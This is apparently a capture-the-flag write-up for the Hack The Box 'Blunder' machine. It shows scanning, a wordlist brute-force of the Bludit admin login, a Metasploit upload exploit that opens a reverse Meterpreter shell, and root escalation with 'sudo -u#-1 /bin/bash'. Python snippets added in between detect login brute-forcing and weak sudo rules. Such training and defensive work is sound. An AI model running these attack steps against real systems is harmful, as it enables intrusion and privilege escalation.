root@liberty:/home/kali# nmap blunder.htb
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.019s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp closed ftp
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds
root@liberty:/home/kali# nmap -sV blunder.htb
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for blunder.htb (10.129.4.41)
Host is up (0.015s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@liberty:/home/kali#
Next is Nikto. Nikto is an open-source (GPL) web server scanner that performs comprehensive tests against web servers:
root@liberty:/home/kali# nikto -h blunder.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.4.41
+ Target Hostname: blunder.htb
+ Target Port: 80
+ Start Time: 2020-10-13 13:32:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: Bludit
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ "robots.txt" contains 1 entry which should be manually viewed.
Next we will enumerate some directories with Dirb. DIRB is a web content scanner: it looks for existing (and/or hidden) web objects by launching a dictionary-based attack against a web server and analyzing the responses.
This allows us to quickly locate interesting directories such as admin portals:
We also find the site itself. This site has a lot of words, so I think this is a perfect time for CeWL.
root@liberty:~# cewl -d 5 -m 3 -w wordlist http://blunder.htb
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@liberty:~# ls
Desktop Documents Downloads htb Music Pictures Public Templates Videos wordlist
root@liberty:~# cat wordlist
the
Load
Plugins
and
for
Include
Site
Page
has
About
King
with
USB
Begin
more
End
service
from
Stadia
Dynamic
...
After fuzzing with dirb I came across this information in /to.txt:
-Inform fergus that the new blog needs images - PENDING
I'm thinking that fergus might be a username. Also, after a quick Google search I came across this exploit:
There are a couple of Ruby requirements for this exploit, so let's install them now.
root@liberty:~/htb# gem install httpclient
Fetching httpclient-2.8.3.gem
Successfully installed httpclient-2.8.3
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Done installing documentation for httpclient after 0 seconds
1 gem installed
root@liberty:~/htb# gem install docopt
Fetching docopt-0.6.1.gem
Successfully installed docopt-0.6.1
Parsing documentation for docopt-0.6.1
Installing ri documentation for docopt-0.6.1
Done installing documentation for docopt after 0 seconds
1 gem installed
root@liberty:~/htb#
Let's give this exploit a try:
root@liberty:~/htb# ruby blut-bf.rb -r http://blunder.htb/admin/ -u fergus -w ../wordlist
[*] Trying password: the
[*] Trying password: Load
[*] Trying password: Plugins
[*] Trying password: and
[*] Trying password: for
[*] Trying password: Include
[*] Trying password: Site
[*] Trying password: Page
[*] Trying password: has
[*] Trying password: About
[*] Trying password: King
[*] Trying password: with
[*] Trying password: USB
[*] Trying password: Begin
...
[+] Password found: RolandDeschain
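From the defender's side, the wordlist attempts above land in the web server's access log as a burst of POSTs to the admin login from one client. The following is an added example (not from this writeup, and not Bludit's own code) that flags any client POSTing to the admin path more than a threshold of times inside a sliding window; the log lines are constructed and the threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format; we only need client, timestamp, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    """Return a dict for one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_login_bruteforce(lines, threshold=10, window=timedelta(minutes=5), path_prefix="/admin/"):
    """Return {client_ip: total_posts} for clients that POSTed to `path_prefix` more than
    `threshold` times within any `window`-long span (sliding window over sorted timestamps).
    Counting keys on the connecting address the server logged, not on any client-supplied header."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith(path_prefix):
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(times)
                break
    return flagged

# Constructed sample: one client firing twelve login POSTs in about a minute, one normal visitor.
SAMPLE = [
    f'10.10.14.45 - - [13/Oct/2020:13:4{i // 10}:{(i % 10) * 5:02d} -0400] "POST /admin/ HTTP/1.1" 200 1234'
    for i in range(12)
] + [
    '10.10.14.9 - - [13/Oct/2020:13:40:00 -0400] "GET /admin/ HTTP/1.1" 200 2048',
    '10.10.14.9 - - [13/Oct/2020:13:41:00 -0400] "POST /admin/ HTTP/1.1" 302 0',
]
```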
With these creds we now have access to the admin portal. After googling "bludit admin portal exploit" I came across this article:
Looks like there is also a Metasploit module:
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 10.10.14.45:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading ZTJkGHVYBh.png...
[*] Uploading .htaccess...
[*] Executing ZTJkGHVYBh.png...
[*] Sending stage (38288 bytes) to 10.129.4.41
[*] Meterpreter session 1 opened (10.10.14.45:4444 -> 10.129.4.41:59626) at 2020-10-13 16:08:49 -0400
[+] Deleted .htaccess
meterpreter > shell
Process 4834 created.
Channel 1 created.
whoami
www-data
This hash can be cracked online. Let's use the recovered password to access the system as this user.
www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ su hugo
su hugo
Password: Password120
Let's locate the user flag now that we have access outside of our PHP shell.
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
FLAG HERE
We can check our sudo permissions using sudo -l:
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$
After some googling we come across this exploit:
They don't come any easier than this. Looks like our privilege escalation requires just this one command: sudo -u#-1 /bin/bash
hugo@blunder:~$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# cat /root/root.txt
cat /root/root.txt
FLAG HERE
root@blunder:/home/hugo#
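The rule that made this possible, (ALL, !root), grants every target user and then tries to subtract root by negation, which the session above shows is not a real restriction. An added example (not from this writeup) that parses sudo -l output and flags Runas lists built that way, so the rule can be rewritten as an explicit allowlist; the sample output is constructed to mirror the one above, and the second rule in it is an assumption.

```python
import re

# Matches the Runas spec sudo -l prints in front of each command, e.g. "(ALL, !root) /bin/bash".
RULE_RE = re.compile(r'^\((?P<users>[^:)]+)(?::(?P<groups>[^)]+))?\)\s+(?P<cmd>.+)$')

def parse_sudo_l(output):
    """Return [(runas_users, runas_groups, command)] for every rule line after the
    'User X may run the following commands' header of `sudo -l` output."""
    rules = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            users = [u.strip() for u in m.group("users").split(",")]
            groups = [g.strip() for g in m.group("groups").split(",")] if m.group("groups") else []
            rules.append((users, groups, m.group("cmd").strip()))
    return rules

def weak_runas_rules(output):
    """Flag rules whose Runas user list contains ALL together with a '!'-negated user.
    Such a rule is a deny-list on top of 'everyone'; the writeup shows it being bypassed
    with a numeric uid, so the fix is to name the permitted target users explicitly."""
    findings = []
    for users, groups, cmd in parse_sudo_l(output):
        if "ALL" in users and any(u.startswith("!") for u in users):
            findings.append(f"{cmd}: Runas '({', '.join(users)})' relies on negation; "
                            "list the permitted target users explicitly instead")
    return findings

# Constructed sample mirroring the sudo -l output above, plus one benign rule for contrast.
SAMPLE = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
    (www-data) /usr/bin/ls /var/www
"""

if __name__ == "__main__":
    for finding in weak_runas_rules(SAMPLE):
        print(finding)
```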